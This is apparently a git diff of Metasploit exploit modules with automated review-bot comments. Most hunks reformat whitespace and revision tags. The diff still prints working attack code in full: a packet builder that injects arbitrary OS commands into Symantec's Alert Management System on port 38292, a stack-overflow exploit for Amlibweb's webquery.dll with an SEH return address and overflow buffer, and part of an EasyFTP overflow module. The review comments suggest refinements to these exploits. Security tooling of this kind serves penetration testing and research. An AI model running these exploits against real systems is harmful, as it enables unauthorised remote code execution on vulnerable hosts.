diff --git a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb index e568352e3c..65ffef9a7b 100644 --- a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb +++ b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb @@ -1,5 +1,5 @@ ## -# $Id: ams_hndlrsvc.rb 9179 2010-04-30 08:40:19Z mc $ +# $Id$ ## ## @@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution', 'Description' => %q{ Symantec System Center Alert Management System is prone to a remote command-injection vulnerability - because the application fails to properly sanitize user-supplied input. + because the application fails to properly sanitize user-supplied input. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66807'], 
@@ -35,101 +35,102 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 26 2010')) - register_options( - [ - Opt::RPORT(38292), - OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']), - ], self.class) + register_options( + [ + Opt::RPORT(38292), + OptString.new('CMD', [ false, 'The OS command to execute', + 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']), + ], self.class) end def run begin connect - cmd = datastore['CMD'] - - if ( cmd.length > 128 ) - raise RuntimeError,"Command strings greater then 128 characters will not be processed!" - end + cmd = datastore['CMD'] - string_uno = Rex::Text.rand_text_alpha_upper(11) - string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5) + if ( cmd.length > 128 ) + raise RuntimeError,"Command strings greater then 128 characters will not be processed!" + end - packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" - packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" - packet << "\xe8\x03\x00\x00" - packet << 'PRGXCNFG' - packet << "\x10\x00\x00\x00" - packet << "\x00\x00\x00\x00\x04" - packet << 'ALHD\F' - packet << "\x00\x00\x01\x00\x00" - packet << "\x00\x01\x00\x0e\x00" - packet << 'Risk Repaired' - packet << "\x00\x25\x00" - packet << 'Symantec Antivirus Corporate Edition' - packet << "\x00\xf9\x1d\x13\x4a\x3f" - packet << [string_uno.length + 1].pack('v') + string_uno - packet << "\x00\x08\x08\x0a" - packet << "\x00" + 'Risk Name' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x0a\x00" - packet << 'File Path' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x11\x00" - packet << 'Requested Action' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << 
"\x00\x08\x0e\x00" - packet << 'Actual Action' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x07\x00" - packet << 'Logger' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x05\x00" - packet << 'User' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x08\x09\x00" - packet << 'Hostname' - packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno - packet << "\x00\x08\x13\x00" - packet << 'Corrective Actions' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00\x00\x07\x08\x12\x00" - packet << 'ConfigurationName' - packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') - packet << "\x00" + cmd - packet << "\x00\x08\x0c\x00" - packet << 'CommandLine' - packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') - packet << "\x00" + cmd - packet << "\x00\x08\x08\x00" - packet << 'RunArgs' - packet << "\x00\x04\x00\x02\x00" - packet << "\x20\x00\x03\x05\x00" - packet << 'Mode' - packet << "\x00\x04\x00\x02\x00\x00\x00" - packet << "\x0a\x0d\x00" - packet << 'FormatString' - packet << "\x00\x02\x00\x00\x00\x08\x12\x00" - packet << 'ConfigurationName' - packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" - packet << 'HandlerHost' - packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') - packet << "\x00" + string_dos - packet << "\x00" * packet.length - - print_status("Sending command: #{datastore['CMD']}") - sock.put(packet) - - disconnect + string_uno = Rex::Text.rand_text_alpha_upper(11) + string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5) + + packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00" + packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00" + packet 
<< "\xe8\x03\x00\x00" + packet << 'PRGXCNFG' + packet << "\x10\x00\x00\x00" + packet << "\x00\x00\x00\x00\x04" + packet << 'ALHD\F' + packet << "\x00\x00\x01\x00\x00" + packet << "\x00\x01\x00\x0e\x00" + packet << 'Risk Repaired' + packet << "\x00\x25\x00" + packet << 'Symantec Antivirus Corporate Edition' + packet << "\x00\xf9\x1d\x13\x4a\x3f" + packet << [string_uno.length + 1].pack('v') + string_uno + packet << "\x00\x08\x08\x0a" + packet << "\x00" + 'Risk Name' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x0a\x00" + packet << 'File Path' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x11\x00" + packet << 'Requested Action' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x0e\x00" + packet << 'Actual Action' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x07\x00" + packet << 'Logger' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x05\x00" + packet << 'User' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x08\x09\x00" + packet << 'Hostname' + packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno + packet << "\x00\x08\x13\x00" + packet << 'Corrective Actions' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00\x00\x07\x08\x12\x00" + packet << 'ConfigurationName' + packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n') + packet << "\x00" + cmd + packet << "\x00\x08\x0c\x00" + packet << 'CommandLine' + packet << [cmd.length + 3].pack('n') 
+ [cmd.length + 1].pack('n') + packet << "\x00" + cmd + packet << "\x00\x08\x08\x00" + packet << 'RunArgs' + packet << "\x00\x04\x00\x02\x00" + packet << "\x20\x00\x03\x05\x00" + packet << 'Mode' + packet << "\x00\x04\x00\x02\x00\x00\x00" + packet << "\x0a\x0d\x00" + packet << 'FormatString' + packet << "\x00\x02\x00\x00\x00\x08\x12\x00" + packet << 'ConfigurationName' + packet << "\x00\x02\x00\x00\x00\x08\x0c\x00" + packet << 'HandlerHost' + packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n') + packet << "\x00" + string_dos + packet << "\x00" * packet.length + + print_status("Sending command: #{datastore['CMD']}") + sock.put(packet) + + disconnect rescue ::Exception - print_error("Error: #{$!.class} #{$!}") + print_error("Error: #{$!.class} #{$!}") end end end diff --git a/modules/auxiliary/admin/symantec/ams_xfr.rb b/modules/auxiliary/admin/symantec/ams_xfr.rb index 736e82cf1f..810b265cc6 100644 --- a/modules/auxiliary/admin/symantec/ams_xfr.rb +++ b/modules/auxiliary/admin/symantec/ams_xfr.rb @@ -1,5 +1,5 @@ ## -# $Id: ams_xfr.rb 9179 2010-04-30 08:40:19Z jduck $ +# $Id$ ## ## @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9179 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1429' ], diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 9476bd2963..3f1594e55e 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb 
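Review bot: `rescue ::Exception` at the end of `run` (new side of the @@ -35,101 hunk) also catches the module's own `RuntimeError` from the 128-character check, plus `Interrupt` and `SystemExit`, so an over-long or unset `CMD` is reported as a generic "Error: RuntimeError …" after a socket has already been opened. Move `cmd = datastore['CMD']` and the length check above `connect` and narrow the handler to `rescue ::StandardError`, so a refused option never produces traffic and a Ctrl-C still aborts the module. Since the option is declared optional, guard nil as well: `raise RuntimeError, "Command strings greater than 128 characters will not be processed!" if cmd.nil? || cmd.length > 128` (this also fixes "greater then" in the message). The hunk begins inside `initialize`, whose `def` line is outside it; `run` and the class-closing `end` are fully within the hunk.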
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. credit goes to Karn Ganeshan. - NOTE: Although, this is likely to exploit the same vulnerability as the + NOTE: Although, this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector. }, 'Author' => @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote if (banner =~ /BigFoolCat/) return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index c98d6283b9..ac129accf5 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb 
@@ -20,30 +20,30 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow', - 'Description' => %q{ - This module exploits a stack overflow in Amlib's Amlibweb - Library Management System (NetOpacs). The webquery.dll - API is available through IIS requests. By specifying - an overly long string to the 'app' parameter, SeH can be - reliably overwritten allowing for arbitrary remote code execution. - In addition, it is possible to overwrite EIP by specifying - an arbitrary parameter name with an '=' terminator. + 'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Amlib's Amlibweb + Library Management System (NetOpacs). The webquery.dll + API is available through IIS requests. By specifying + an overly long string to the 'app' parameter, SeH can be + reliably overwritten allowing for arbitrary remote code execution. + In addition, it is possible to overwrite EIP by specifying + an arbitrary parameter name with an '=' terminator. }, - 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '66814'], - [ 'URL', 'http://www.aushack.com/advisories/' ], - ], + 'Author' => [ 'patrick' ], + 'Arch' => [ ARCH_X86 ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '66814'], + [ 'URL', 'http://www.aushack.com/advisories/' ], + ], 'Privileged' => true, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => { 'Space' => 600, 
@@ -54,15 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # patrickw - Tested OK 20100803 w2k IIS5 - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 - # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. - ], + [ + # patrickw - Tested OK 20100803 w2k IIS5 + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5 + # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only. + ], 'DisclosureDate' => 'Aug 03 2010', #0day 'DefaultTarget' => 0)) - register_options( + register_options( [ Opt::RPORT(80), ],self.class) @@ -70,9 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - + rand = Rex::Text.rand_text_alpha(10) - + sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n") res = sock.get(-1,3) disconnect @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end end - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit connect seh = generate_seh_payload(target.ret) - buffer = Rex::Text.rand_text_alphanumeric(3028) + seh + buffer = Rex::Text.rand_text_alphanumeric(3028) + seh sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n" sock.put(sploit + "\r\n\r\n")
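Review bot: In `check` (the @@ -70,9 hunk of amlibweb_webquerydll_app.rb) the local `rand = Rex::Text.rand_text_alpha(10)` shadows `Kernel#rand` for the rest of the method, a readability trap for whoever next adds a `rand` call there; the commit cleans the blank lines around it but keeps the name. Rename it to something descriptive, e.g. `marker = Rex::Text.rand_text_alpha(10)` and `sock.put("GET /amlibweb/webquery.dll?#{marker}= HTTP/1.0\r\n\r\n")`. The hunk is otherwise whitespace-only, and the lines of `check` that inspect `res` fall between this hunk and the @@ -82,14 one, so they are not visible here.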